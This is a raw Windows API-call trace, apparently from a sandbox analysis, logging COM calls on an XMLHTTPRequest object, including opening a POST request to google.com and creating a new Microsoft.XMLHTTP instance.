	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x62b540) returned 0x0
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x62b540) returned 0x0
	[0214.986] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
	[0214.986] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c8a0 | out: ppvObject=0x28c8a0*=0x62b540) returned 0x0
	[0214.987] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8d0 | out: ppvObject=0x28c8d0*=0x0) returned 0x80004002
	[0214.987] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.987] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.987] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c8b0 | out: ppvObject=0x28c8b0*=0x0) returned 0x80004002
	[0214.987] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.987] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d9c8 | out: ppvObject=0x28d9c8*=0x62b540) returned 0x0
	[0214.987] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d9c0 | out: ppvObject=0x28d9c0*=0x0) returned 0x80004002
	[0214.987] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.987] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0214.987] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0214.987] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0214.988] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x2
	[0214.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0214.988] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0214.988] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x2
	[0214.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0214.988] XMLHTTPRequest:IDispatch:Invoke (in: This=0x49c74a0, dispIdMember=1, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40, puArgErr=0x28da10 | out: pDispParams=0x28d9f8*(rgvarg=([0]=0x62a458*(varType=0xb, wReserved1=0x28, wReserved2=0x0, wReserved3=0x0, varVal1=0x620000, varVal2=0x0), [1]=0x62a470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://www.google.com", varVal2=0x0), [2]=0x62a488*(varType=0x400c, wReserved1=0x706f, wReserved2=0x6473, wReserved3=0x7563, varVal1=0x62ace8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="POST", varVal2=0x0), varVal2=0x20200a0d32323632)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28da40*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28da10*=0x0) returned 0x0
	[0214.988] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf68 | out: ppvObject=0x28cf68*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28cf70 | out: ppvObject=0x28cf70*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:AddRef (This=0x62b540) returned 0x2
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d150 | out: ppvObject=0x28d150*=0x62b540) returned 0x0
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28bf70 | out: ppvObject=0x28bf70*=0x62b540) returned 0x0
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28bfa8 | out: ppvObject=0x28bfa8*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28bf98 | out: ppvObject=0x28bf98*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28bf68 | out: ppvObject=0x28bf68*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c058 | out: ppvObject=0x28c058*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c040 | out: ppvObject=0x28c040*=0x62b540) returned 0x0
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c070 | out: ppvObject=0x28c070*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c048 | out: ppvObject=0x28c048*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c050 | out: ppvObject=0x28c050*=0x0) returned 0x80004002
	[0214.989] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x3
	[0214.989] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x62b540, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28d168 | out: ppvObject=0x28d168*=0x62b540) returned 0x0
	[0214.990] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x62b540, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x28d160 | out: ppvObject=0x28d160*=0x0) returned 0x80004002
	[0214.990] XMLHTTPRequest:IUnknown:Release (This=0x62b540) returned 0x2
	[0214.990] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0214.990] SysStringLen (param_1=0x0) returned 0x0
	[0214.990] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0214.990] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c75a0) returned 0x0
	[0214.990] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c75a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0214.990] ??2@YAPEAX_K@Z () returned 0x629bd0
	[0214.990] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x629bd0) returned 0x0
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8 | out: ppvObject=0x28d7c8*=0x0) returned 0x80004002
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fefe436f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7d0 | out: ppvObject=0x28d7d0*=0x0) returned 0x80004002
	[0214.990] XMLHTTPRequest:IUnknown:AddRef (This=0x629bd0) returned 0x2
	[0214.990] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28a8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d9b0 | out: ppvObject=0x28d9b0*=0x629bd0) returned 0x0
	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x28c7d0 | out: ppvObject=0x28c7d0*=0x629bd0) returned 0x0
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef2899ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c808 | out: ppvObject=0x28c808*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef28b0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c7f8 | out: ppvObject=0x28c7f8*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x629bd0, guidService=0x7fef28b0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef28b08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x28c7c8 | out: ppvObject=0x28c7c8*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IUnknown:Release (This=0x629bd0) returned 0x3
	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28abbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x28c8a8 | out: ppvObject=0x28c8a8*=0x0) returned 0x80004002
	[0214.991] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x629bd0, riid=0x7fef28b08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c8b8 | out: ppvObject=0x28c8b8*=0x0) returned 0x80004002
